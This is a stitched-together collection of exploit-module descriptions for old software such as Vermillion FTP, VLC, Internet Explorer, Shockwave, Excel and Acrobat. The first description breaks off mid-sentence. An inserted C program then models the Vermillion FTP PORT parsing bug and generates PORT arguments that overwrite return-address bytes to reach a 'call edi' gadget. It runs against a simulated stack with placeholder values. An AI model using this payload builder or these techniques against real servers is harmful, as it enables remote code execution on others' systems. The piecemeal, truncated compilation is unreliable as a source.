This module exploits an out-of-bounds array access in the Arcane Software Vermillion FTP server. By sending a specially crafted FTP PORT command, an attacker can corrupt stack memory and execute arbitrary code. This particular issue is caused by processing data bounded only by attacker-controlled input while writing into a 4 byte stack buffer. Unfortunately, the writing that occurs is not a simple byte copy. Processing is done using a source pointer (p) and a destination pointer (q). The vulnerable function walks the input string and continues while the source byte is non-null. If a comma is encountered, the function increments the destination pointer. If an ASCII digit [0-9] is encountered, the following occurs: *q = (*q * 10) + (*p - '0'); All other input characters are ignored in this loop. As a consequence, an attacker must craft input such that modifications to the current values on the stack result in usable values. In this exploit, the low two bytes of the return address are adjusted to point at the location of a 'call edi' instruction within the binary. This was chosen since 'edi' points at the source buffer when the function returns. NOTE: This server can be installed as a service using 'vftpd.exe install'. If so, the service does not restart automatically, giving an attacker only
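The PORT parsing loop above is worth seeing in code, because the write primitive it gives is unusual: a digit does not store a value, it folds into whatever byte is already there (v becomes v*10 + d mod 256), and only a comma moves the pointer. The following is an added model written for this page; it is not the vendor's code or the module's. port_parse() reproduces the loop over a constructed stack image (4 byte buffer, saved frame pointer, little-endian return address; all values invented), digits_for_byte() finds the shortest digit string that drives one existing byte to a wanted byte (at most three digits are ever needed, since 1000 consecutive values cover every residue mod 256), and build_port_arg() assembles a PORT argument that skips the first bytes with bare commas and rewrites only the chosen ones. The 'call edi' address is a placeholder; the real exploit computes it from the target binary.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the vulnerable loop as described: ',' advances q, a digit does
 * *q = *q*10 + digit, anything else is ignored.  `cap` bounds the modelled
 * stack so this simulation cannot overrun; the real parser has no such check.
 * Returns the highest offset written, or -1 if no digit was processed. */
static int port_parse(const char *p, uint8_t *stack, size_t cap)
{
    uint8_t *q = stack;
    int high = -1;
    for (; *p; p++) {
        if (*p == ',') {
            q++;
        } else if (*p >= '0' && *p <= '9') {
            size_t off = (size_t)(q - stack);
            if (off >= cap)
                break;                          /* model guard only */
            *q = (uint8_t)(*q * 10 + (*p - '0'));
            if ((int)off > high)
                high = (int)off;
        }
    }
    return high;
}

/* Shortest digit string taking one byte from `from` to `to` under
 * v -> (v*10 + d) mod 256 (breadth-first search over 256 states).
 * `out` needs room for 4 chars.  Returns the digit count, or -1. */
static int digits_for_byte(uint8_t from, uint8_t to, char *out)
{
    int prev[256], via[256] = {0};
    uint8_t queue[256];
    int head = 0, tail = 0, found = 0;

    out[0] = '\0';
    if (from == to)
        return 0;                      /* byte already usable: no digits */
    for (int i = 0; i < 256; i++)
        prev[i] = -1;
    prev[from] = from;
    queue[tail++] = from;
    while (head < tail && !found) {
        uint8_t v = queue[head++];
        for (int d = 0; d < 10 && !found; d++) {
            uint8_t nxt = (uint8_t)(v * 10 + d);
            if (prev[nxt] != -1)
                continue;              /* already reached by a shorter path */
            prev[nxt] = v;
            via[nxt] = d;
            queue[tail++] = nxt;
            if (nxt == to)
                found = 1;
        }
    }
    if (!found)
        return -1;
    char rev[8];
    int len = 0;
    for (int v = to; v != from && len < 7; v = prev[v])
        rev[len++] = (char)('0' + via[v]);   /* walk back from target */
    for (int i = 0; i < len; i++)
        out[i] = rev[len - 1 - i];
    out[len] = '\0';
    return len;
}

/* PORT argument that leaves bytes [0, off) untouched (commas only) and
 * drives `n` bytes at `off` from their current values `cur` to `want`. */
static int build_port_arg(size_t off, const uint8_t *cur, const uint8_t *want,
                          size_t n, char *out, size_t outcap)
{
    size_t len = 0;
    for (size_t i = 0; i < off; i++) {
        if (len + 1 >= outcap) return -1;
        out[len++] = ',';
    }
    for (size_t i = 0; i < n; i++) {
        char d[8];
        int k = digits_for_byte(cur[i], want[i], d);
        if (k < 0 || len + (size_t)k + 2 >= outcap) return -1;
        memcpy(out + len, d, (size_t)k);
        len += (size_t)k;
        if (i + 1 < n) out[len++] = ',';
    }
    out[len] = '\0';
    return (int)len;
}

int main(void)
{
    /* Constructed stack image: buffer[4], saved frame pointer[4], return
     * address 0x40123456 stored little-endian.  All values are invented. */
    uint8_t stack[12] = {0, 0, 0, 0, 0x28, 0xff, 0x12, 0x00, 0x56, 0x34, 0x12, 0x40};
    uint8_t want[2] = {0xcd, 0xab};        /* placeholder low bytes of 'call edi' */
    char arg[64];
    if (build_port_arg(8, stack + 8, want, 2, arg, sizeof arg) < 0)
        return 1;
    printf("PORT %s\n", arg);
    port_parse(arg, stack, sizeof stack);
    printf("ret = 0x%02x%02x%02x%02x\n", stack[11], stack[10], stack[9], stack[8]);
    return 0;
}
```

Because the loop ignores everything that is not a digit or a comma, bytes after the rewrite can carry other data, but any 0x2c or 0x30 to 0x39 byte in that tail would itself be interpreted by the parser, which is the constraint the real module has to satisfy when edi is later used as the return target.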
This module exploits an input validation error in VideoLAN VLC < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker could execute arbitrary code. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPolicy to permanently enable NX support on machines that support it.
This module exploits a memory corruption within the MSVidCtl component of Microsoft DirectShow (BDATuner.MPEG2TuneRequest). By loading a specially crafted GIF file, an attacker can overrun a buffer and execute arbitrary code. ClassID is now configurable via an advanced option (otherwise randomized) - I)ruid
This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the 'Operation Aurora' attacks that led to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample; as such, only Internet Explorer 6 can be reliably exploited.
This module exploits a weakness in the Adobe Shockwave player's handling of Director movies (.DIR). A memory corruption vulnerability occurs through an undocumented rcsL chunk.
chfn, chpass and chsh do not properly parse the authname switch ("-u"), which causes the applications to crash when parsing a long string. These binaries are setuid root by default.
The Adobe Shockwave Director is vulnerable to a memory corruption vulnerability in the tSAC Chunk. An attacker can exploit this vulnerability to execute arbitrary code on the target system. The impact of this vulnerability is considered to be medium to high.
This exploit targets a memory corruption vulnerability in Microsoft Excel's HFPicture Record parsing. It allows an attacker to corrupt memory and potentially execute arbitrary code.
This exploit targets a memory corruption vulnerability in Adobe Acrobat and Reader related to the "pushstring" function. It allows an attacker to execute arbitrary code on a target system. The impact of this vulnerability is considered to be medium to high.
The exploit takes advantage of a memory corruption vulnerability in Excel 2002 SP3. It uses a combination of pop/pop/ret and call esp instructions to execute shellcode.